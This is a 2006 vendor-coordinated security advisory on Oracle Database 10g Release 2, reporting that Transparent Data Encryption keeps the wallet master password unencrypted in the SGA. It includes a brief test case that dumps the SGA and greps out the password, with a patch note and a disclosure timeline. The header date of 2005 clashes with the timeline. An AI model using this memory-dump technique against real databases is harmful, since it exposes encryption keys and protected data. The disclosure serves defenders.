Oracle Database 10g Rel. 2- Transparent Data Encryption plaintext masterkey in SGA
Transparent Data Encryption stores key unencrypted in the SGA
Name Transparent Data Encryption stores key unencrypted in the SGA
Affected Oracle Database 10g Release 2
Severity High Risk
Category Information disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 17 January 2005 (V 1.00)
Oracle Bug 5802173
Time to fix 190 days
Details:
########
The Oracle security feature "Transparent Data Encryption" is storing the
masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can
retrieve the plaintext masterkey.
Test case:
##########
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0
Production With the Partitioning, OLAP and Data Mining options
[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword
secretpassword
secretpassword
secretpassword
[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-
^@^@0êd$L4^L¿^Xp
/¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]
Patch Information:
##################
Oracle fixed this issue with the patches from the critical patch update january
2006 for Oracle 10g Release 2.
History:
########
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006
(CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory
© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html